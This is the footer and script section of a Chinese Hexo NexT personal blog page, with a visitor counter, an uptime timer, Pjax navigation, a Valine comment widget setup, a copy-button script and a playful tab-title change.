  <span class="author" itemprop="copyrightHolder">故里</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">1.2m</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">18:16</span>
</div>







<section class="footer-time">
    <span class="footer__copyright">
    <div>
    <span id="span_dt_dt"> </span>
    <script language="javascript">
      function show_date_time(){
        window.setTimeout("show_date_time()", 1000);
        BirthDay=new Date("12/25/2021 10:56:12");//这个日期是可以修改的
        today=new Date();
        timeold=(today.getTime()-BirthDay.getTime());//其实仅仅改了这里
        sectimeold=timeold/1000
        secondsold=Math.floor(sectimeold);
        msPerDay=24*60*60*1000
        e_daysold=timeold/msPerDay
        daysold=Math.floor(e_daysold);
        e_hrsold=(e_daysold-daysold)*24;
        hrsold=Math.floor(e_hrsold);
        e_minsold=(e_hrsold-hrsold)*60;
        minsold=Math.floor((e_hrsold-hrsold)*60);
        seconds=Math.floor((e_minsold-minsold)*60);
        span_dt_dt.innerHTML="我已在此等候你 "+daysold+" 天 "+hrsold+" 小时 "+minsold+" 分 "+seconds+" 秒";
      }
      show_date_time();
    </script>
    </div>
	
	




<!--这一段是不蒜子的访问量统计代码-->
<script async src="http://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
我的第<span id="busuanzi_value_site_uv"></span>位朋友
历经<span id="busuanzi_value_site_pv"></span>次回眸才与你相遇</span>

	 
	 
	 

<a target="_blank" rel="noopener" href="https://www.upyun.com/?utm_source=lianmeng&amp;utm_medium=referra"><img src="https://z4a.net/images/2022/05/31/image649ac1128183cf97.png"align="absmiddle" width="59px" height="30px" /></a>



        
<div class="busuanzi-count">
  <script data-pjax async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item;">
      <span class="post-meta-item-icon">
        <i class="eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  


  
  

  
  <script color='255,255,225' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="//img.hzy2003628.top/busuanzi/jquery.min.js"></script>
  <script src="//img.hzy2003628.top/busuanzi/jquery.fancybox.min.js"></script>

<script src="/js/utils.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  
  <script data-pjax>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>




  
<script src="/js/local-search.js"></script>















    <div id="pjax">
  

  


  

  <script src="/js/activate-power-mode.min.js"></script>
  <script>
    POWERMODE.colorful = true;
    POWERMODE.shake = false;
    document.body.addEventListener('input', POWERMODE);
  </script>


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : true,
      appId      : 'kkHz96fwDwdnhN10VTUS0KUx-gzGzoHsz',
      appKey     : '3th47KWUKTQ2oX3tNXqz6WQW',
      placeholder: "来留下你的痕迹吧",
      avatar     : 'retro',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

    </div>




  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('复制').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('复制成功')
          else $(this).text('复制失败')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('复制')
        }, 300)
      }).append(e)
    })
  </script>







</body>
</html>



<script type="text/javascript" src="/js/love.js"></script>




<script type="text/javascript">
    var OriginTitile=document.title,st;
	document.addEventListener("visibilitychange",function(){
        document.hidden?(document.title="ヽ(●-`Д´-)ノ网页崩溃了",clearTimeout(st)):(document.title="(Ő∀Ő3)ノ骗你的，别走了！",st=setTimeout(function(){document.title=OriginTitile},3e3))
    })
</script>


